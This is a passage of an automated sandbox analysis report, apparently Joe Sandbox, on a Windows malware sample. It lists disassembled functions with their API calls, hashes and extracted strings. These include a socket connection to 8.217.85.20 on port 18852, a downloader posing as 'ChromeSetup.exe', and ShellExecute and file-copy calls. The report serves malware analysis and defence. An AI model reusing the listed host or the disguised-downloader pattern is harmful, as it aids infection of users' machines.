                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 10016C06
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 10016C15
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 10016C1E
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 10016C2B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                  • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                                  • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                  • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                                  Function 008E66F8 Relevance: 1.7, APIs: 1, Instructions: 242COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008E670E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                  • Instruction ID: 4f89cdc36d4eb4707b36a4d6fc179db05d0913e758f4f6e1447a6033a2288b05
                                                                                                  • Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                  • Instruction Fuzzy Hash: 88A17EB1E00669CBEB19CF55C8C1BA9BBB1FB59364F19C22AE415E7250E334D960CF90
                                                                                                  Function 10016721 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10016737
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                  • Instruction ID: 772fdfb54747e28d4c8254296b593cf3c963f9d1e760632a41fcaf1a051b6687
                                                                                                  • Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                  • Instruction Fuzzy Hash: ABA128B1A10669CBEB15CF54CCC1BA9BBF4FB48364F19C62AE415AB290D374D984CF90
                                                                                                  Function 008D0AE4 Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                  • Instruction ID: 74a84e5746233f73a5d1a6a2f87331474e54b7ce7239d5b21f2ea63068075f21
                                                                                                  • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                  • Instruction Fuzzy Hash: 7C317C76A0834A8FC710DF18C480A2AB7E4FF89328F190A6EE895D7312D370F9558F91
                                                                                                  Function 10015490 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 163networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 100154B3
                                                                                                  • getaddrinfo.WS2_32(8.217.85.20,18852,?,00000000), ref: 100154FA
                                                                                                  • WSACleanup.WS2_32 ref: 10015509
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
                                                                                                  • socket.WS2_32(?,?,?), ref: 10015552
                                                                                                  • WSACleanup.WS2_32 ref: 10015566
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                  • String ID: 18852$8.217.85.20
                                                                                                  • API String ID: 2357443324-3503856973
                                                                                                  • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                  • Instruction ID: 8ea8c21000931f3664100cedd98eebcd754df86da53339749fb4ddc4d9d3f251
                                                                                                  • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                  • Instruction Fuzzy Hash: 576128B5904629EFE704DFA4CC88F9DB7B5FB08306F148219E519AB2A0C775DA80CF65
                                                                                                  Function 008D1637 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 179windowregistrythreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 008D1659
                                                                                                    • Part of subcall function 008D1407: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 008D1462
                                                                                                    • Part of subcall function 008D1407: CoTaskMemFree.COMBASE(00000000), ref: 008D14B5
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 008D176F
                                                                                                  • RegisterClassW.USER32(?), ref: 008D17CE
                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 008D17D6
                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 008D17E9
                                                                                                  • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 008D1835
                                                                                                  • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?), ref: 008D1844
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008D186B
                                                                                                  • TranslateMessage.USER32(?), ref: 008D1879
                                                                                                  • DispatchMessageW.USER32(?), ref: 008D1883
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$CreateMetricsSystemWindow$ClassDispatchFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslate
                                                                                                  • String ID: ChromeSetup.exe$URLDownloader
                                                                                                  • API String ID: 3953380684-4101260699
                                                                                                  • Opcode ID: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                                  • Instruction ID: e2a26e6c0056cbdf55e8e83543229713c6f2a0d485e09365b971e6d2728ef5c9
                                                                                                  • Opcode Fuzzy Hash: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                                  • Instruction Fuzzy Hash: D671F9B1D00258AFEB14DFA8CC45BDDBBB4FB48700F10826AE609E7280E7749A45CF51
                                                                                                  Function 008E5467 Relevance: 19.7, APIs: 13, Instructions: 163networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 008E548A
                                                                                                  • getaddrinfo.WS2_32(1001C0E0,100185B0,?,00000000), ref: 008E54D1
                                                                                                  • WSACleanup.WS2_32 ref: 008E54E0
                                                                                                  • socket.WS2_32(?,?,?), ref: 008E5529
                                                                                                  • WSACleanup.WS2_32 ref: 008E553D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560534018-0
                                                                                                  • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                  • Instruction ID: 98c35626c7c20e31f4b5eb43d37a6c9f45a626a155e8b828348e9a6afdb72c70
                                                                                                  • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                  • Instruction Fuzzy Hash: E86117B1904629EFE704CFA8CD88FAD77B5FB09309F108618E519A72A0D734DA40CF65
                                                                                                  Function 10016EA0 Relevance: 18.2, APIs: 12, Instructions: 154memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,10001A66,00000000,00000000,28DFAA23,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016F29
                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016F65
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,?,00000000,00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FA4
                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 10016FAF
                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FC0
                                                                                                  • _com_issue_error.COMSUPP ref: 10016FD8
                                                                                                  • _com_issue_error.COMSUPP ref: 10016FE2
                                                                                                  • GetLastError.KERNEL32(80070057,28DFAA23,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016FE7
                                                                                                  • _com_issue_error.COMSUPP ref: 10016FFA
                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017008
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017010
                                                                                                  • _com_issue_error.COMSUPP ref: 10017023
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWidefree$AllocStringmalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2710271231-0
                                                                                                  • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                  • Instruction ID: 6285890bd5176054e2d15964e4e0697efcddc290ec620ce681aa416c4b1e3c3a
                                                                                                  • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                  • Instruction Fuzzy Hash: EA41C3B5A00219ABD700CFA8DC45B9EBBE9FB4C650F114229F509EB281D735E981CBA0
                                                                                                  Function 008E6E77 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,008D1A3B,008D1A3D,00000000,00000000,1001C040,?,?,?,008D1BBB,008D1A3B,00000000,?,008D1A3B,008D27A3), ref: 008E6F00
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,008D1A3B,?,00000000,00000000,?,008D1BBB,008D1A3B,00000000,?,008D1A3B), ref: 008E6F7B
                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 008E6F86
                                                                                                  • _com_issue_error.COMSUPP ref: 008E6FAF
                                                                                                  • _com_issue_error.COMSUPP ref: 008E6FB9
                                                                                                  • GetLastError.KERNEL32(80070057,1001C040,?,?,?,008D1BBB,008D1A3B,00000000,?,008D1A3B,008D27A3), ref: 008E6FBE
                                                                                                  • _com_issue_error.COMSUPP ref: 008E6FD1
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,008D1BBB,008D1A3B,00000000,?,008D1A3B,008D27A3), ref: 008E6FE7
                                                                                                  • _com_issue_error.COMSUPP ref: 008E6FFA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1353541977-0
                                                                                                  • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                  • Instruction ID: 39e2daa92579a9dc51cff7447b150ad1b1eea4b6c7f276c153012b0298162f43
                                                                                                  • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                  • Instruction Fuzzy Hash: 96412CB1A04255EBDB10DF6ADC45BAEBBA8FF59790F204229F505D7380EB34D910C7A1
                                                                                                  Function 100164C3 Relevance: 13.6, APIs: 9, Instructions: 135COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __RTC_Initialize.LIBCMT ref: 1001650A
                                                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 10016524
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                                                  • String ID:
                                                                                                  • API String ID: 2442719207-0
                                                                                                  • Opcode ID: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                                  • Instruction ID: a50b9bcbe80e21d08239303d3e1b85a5ff725acd6039f41ad542be21913079e7
                                                                                                  • Opcode Fuzzy Hash: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                                  • Instruction Fuzzy Hash: A7419372E01629AFDB21CF94DD41B9E7AB9EB4C690F118129F8146F151C731DE818BE0
                                                                                                  Function 10012150 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012187
                                                                                                  • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012194
                                                                                                  • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001219F
                                                                                                  • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 100121BB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1504536088-3916222277
                                                                                                  • Opcode ID: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                                  • Instruction ID: a0487576b8a3c5ffe6c335ea50ad64326e07086e404223857e371bd2d0d575a7
                                                                                                  • Opcode Fuzzy Hash: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                                  • Instruction Fuzzy Hash: 9C5161F5D00119EFDB04CFD4D8819EEBBB5EF48244F148459E901AB241EB34EBA4CBA5
                                                                                                  Function 008E57F7 Relevance: 10.9, APIs: 7, Instructions: 357filesynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 008D5487: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 008D54A8
                                                                                                    • Part of subcall function 008E5727: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 008E575A
                                                                                                    • Part of subcall function 008E56D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 008E56F5
                                                                                                  • _Smanip.LIBCPMTD ref: 008E5AE1
                                                                                                  • _Smanip.LIBCPMTD ref: 008E5B7B
                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 008E5CB8
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 008E5CD4
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008E5CE1
                                                                                                  • CopyFileA.KERNEL32(00000000,?,00000000), ref: 008E5D4A
                                                                                                  • ShellExecuteA.SHELL32(00000000,100185D4,?,00000000,00000000,00000001), ref: 008E5D70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyFolderHandleObjectPathSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 831046560-0
                                                                                                  • Opcode ID: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                                  • Instruction ID: d2a75ef10eadf8d31c25cbf06ee296667e39cb4e8b128bce72abc6f2f74631cd
                                                                                                  • Opcode Fuzzy Hash: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                                  • Instruction Fuzzy Hash: 27023670D083D8DEEB11DBA8C855BDDBFB1AF26304F0441D9D1486B282D7BA5B48CB62
                                                                                                  Function 10011CD0 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CF2
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CFF
                                                                                                  • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011D0A
                                                                                                  • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10011D17
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 623893373-0
                                                                                                  • Opcode ID: 52e15d50399265125c64f399d886bb165b5bbf37f1e1fda9a42ed22037138c62
                                                                                                  • Instruction ID: a0288be0b98a9ca1868d6d550198ab6d9a445e2d27cbf722241acd90e910a963
                                                                                                  • Opcode Fuzzy Hash: 52e15d50399265125c64f399d886bb165b5bbf37f1e1fda9a42ed22037138c62
                                                                                                  • Instruction Fuzzy Hash: 23716AB5C1021DDFDB18DFE4D8959EEB7B1FF04250F104129E516AB291EB30AE85CBA1
                                                                                                  Function 10011B60 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 10011B98
                                                                                                  • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011BB8
                                                                                                  • _Min_value.LIBCPMTD ref: 10011BCF
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10011BE3
                                                                                                  • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011C0F
                                                                                                  • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 10011C4D
                                                                                                  • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 10011C9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                  • String ID:
                                                                                                  • API String ID: 1591557727-0
                                                                                                  • Opcode ID: d4fc38bd5d27632a969096010cf362d5f07236698e0cba18835fbb4ee552d5b6
                                                                                                  • Instruction ID: e0e71f9b7f058a59da033de4bce7e27fb15f803cdd6c81aee40a3e1b4d5913a5
                                                                                                  • Opcode Fuzzy Hash: d4fc38bd5d27632a969096010cf362d5f07236698e0cba18835fbb4ee552d5b6
                                                                                                  • Instruction Fuzzy Hash: CF51C775E00109EFDB48CF98C984AEEBBB5FF88344F108169E905AB354D730AE85DB90
                                                                                                  Function 10016571 Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 3353612457-0
                                                                                                  • Opcode ID: 98b3f14604f10840f3c0567c90b7ef5983de27fd412168009cf08e435744699c
                                                                                                  • Instruction ID: 54edc5666c311e175fc24a18419b6af998dcce978129f85e44b2e6ec709a6a51
                                                                                                  • Opcode Fuzzy Hash: 98b3f14604f10840f3c0567c90b7ef5983de27fd412168009cf08e435744699c
                                                                                                  • Instruction Fuzzy Hash: E6216DB2D01669ABDB21CF55DD41E6E3AA9EB8CAD0F014129F8146F255C231DE819BE0
                                                                                                  Function 10012000 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001200D
                                                                                                  • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001201E
